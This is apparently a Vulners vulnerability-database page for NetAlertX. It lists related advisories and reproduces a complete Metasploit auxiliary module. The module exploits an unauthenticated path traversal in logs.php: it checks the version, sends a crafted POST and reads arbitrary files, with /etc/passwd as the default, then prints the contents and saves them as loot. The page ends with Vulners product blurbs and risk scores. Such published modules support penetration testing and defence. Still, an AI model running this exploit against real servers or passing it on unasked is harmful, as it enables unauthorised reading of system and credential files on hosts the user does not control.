Vulners
Lucene search
NetAlertX File Read Vulnerability
| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
 | Exploit for Missing Authentication for Critical Function in Netalertx | 27 Dec 202522:07 | – | githubexploit |
 | The vulnerability of the saveSettings() function in the settings.php script of the NetAlert X intrusion notification network infrastructure allows a intruder to execute arbitrary code. | 11 Mar 202500:00 | – | bdu_fstec |
| The vulnerability in the security.php script of the NetAlert X intrusion notification network infrastructure allows a perpetrator to read arbitrary files. | 11 Mar 202500:00 | – | bdu_fstec |
 | CVE-2024-46506 | 30 Jan 202512:03 | – | circl |
 | NetAlertX 安全漏洞 | 13 May 202500:00 | – | cnnvd |
| NetAlertX 安全漏洞 | 13 May 202500:00 | – | cnnvd |
 | CVE-2024-46506 | 13 May 202500:00 | – | cve |
 | CVE-2024-46506 | 13 May 202500:00 | – | cvelist |
 | Unauthenticated RCE in NetAlertX | 11 Feb 202518:55 | – | metasploit |
 | NetAlertX 23.01.14–24.x < 24.10.12 - Remote Code Execution | 27 Jun 202603:01 | – | nuclei |
10
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => ' NetAlertX File Read Vulnerability',
'Description' => %q{
This module exploits improper authentication in logs.php endpoint. An unathenticated attacker can request log file and read any file due path traversal vulnerability.
},
'References' => [
['CVE', '2024-48766'],
['URL', 'https://rhinosecuritylabs.com/research/cve-2024-46506-rce-in-netalertx/']
],
'Author' => [
'chebuya', # Vulnerability discovery
'msutovsky-r7' # Metasploit module
],
'DisclosureDate' => '2025-01-30',
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
register_options(
[
Opt::RPORT(20211),
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5])
]
)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'maintenance.php')
})
return Exploit::CheckCode::Unknown('No response or unexpected status code from target') unless res&.code == 200
html_document = res.get_html_document
return Exploit::CheckCode::Unknown('Failed to get html document.') if html_document.blank?
version_element = html_document.xpath('//div[text()="Installed version"]//following-sibling::*')
return Exploit::CheckCode::Unknown('Failed to get version element.') if version_element.blank?
version = Rex::Version.new(version_element.text&.strip&.sub(/^v/, ''))
return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.") unless version.between?(Rex::Version.new('24.7.18'), Rex::Version.new('24.9.12'))
Exploit::CheckCode::Appears("Version #{version} detected.")
end
def run_host(ip)
traversal = '../' * datastore['DEPTH']
filepath = datastore['FILEPATH']
dummyfilename = Rex::Text.rand_text_alphanumeric(6)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('/php/components/logs.php'),
'vars_post' =>
{
'items' => %([{"buttons":[{"labelStringCode":"Maint_PurgeLog","event":"logManage(app.log, cleanLog)"},{"labelStringCode":"Maint_RestartServer","event":"askRestartBackend()"}],"fileName":"#{dummyfilename}","filePath":"#{traversal}#{filepath}","textAreaCssClass":"logs"}])
}
})
fail_with Failure::Unreachable, 'Connection failed' unless res
fail_with Failure::NotVulnerable, 'Unexpected response code' unless res&.code == 200
fail_with Failure::NotVulnerable, 'Unexpected response' if res&.body.blank?
html = res.get_html_document
fail_with Failure::NotVulnerable, 'No HTML body' if html.blank?
log_data = html.at('textarea')
fail_with Failure::PayloadFailed, 'No data' if log_data&.blank? || log_data&.text&.empty?
print_status 'Received data:'
print_status log_data.text
loot_path = store_loot(
'netalert.results',
'text/plain',
ip,
log_data.text,
"netalert-#{filepath}.txt",
'NetAlertX'
)
print_status "Stored results in #{loot_path}"
report_vuln({
host: rhost,
port: rport,
name: name,
refs: references,
info: "Module #{fullname} successfully leaked file"
})
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jun 2026 19:05Current
8.5High risk
Vulners AI Score8.5
CVSS 3.110
EPSS0.50233
SSVC